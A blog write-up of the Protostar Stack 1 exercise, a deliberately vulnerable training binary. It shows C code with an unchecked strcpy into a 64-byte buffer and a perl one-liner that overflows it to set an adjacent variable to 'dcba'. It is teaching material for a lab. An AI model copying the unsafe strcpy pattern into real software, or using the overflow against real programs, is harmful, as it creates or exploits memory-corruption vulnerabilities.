MattAndreko.com

"hostess is a code-slaying dragon found deep within the core of the earth, unearthing magma and vulnerabilities single handedly while using the other hand to pet his cat"

Exploit Exercises - Protostar Stack 1

| Comments

This challenge is very similar to the previous one. The main difference is that instead of just validating that the “modified” value was changed, it validates that it was changed to a specific value, 0x61626364, or “dcba” in ASCII.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 if(argc == 1) {
  errx(1, "please specify an argument\n");
 }

 modified = 0;
 strcpy(buffer, argv[1]);

 if(modified == 0x61626364) {
  printf("you have correctly got the variable to the right value\n");
 } else {
  printf("Try again, you got 0x%08x\n", modified);
 }
}

To complete this, we simply run:

1
2
user@protostar:/opt/protostar/bin$ ./stack1 `perl -e 'print "A"x64 . "dcba"'`
you have correctly got the variable to the right value

This will fill up the “buffer” with 64 “A”s, and overflow “dcba” into the “modified” variable.

Comments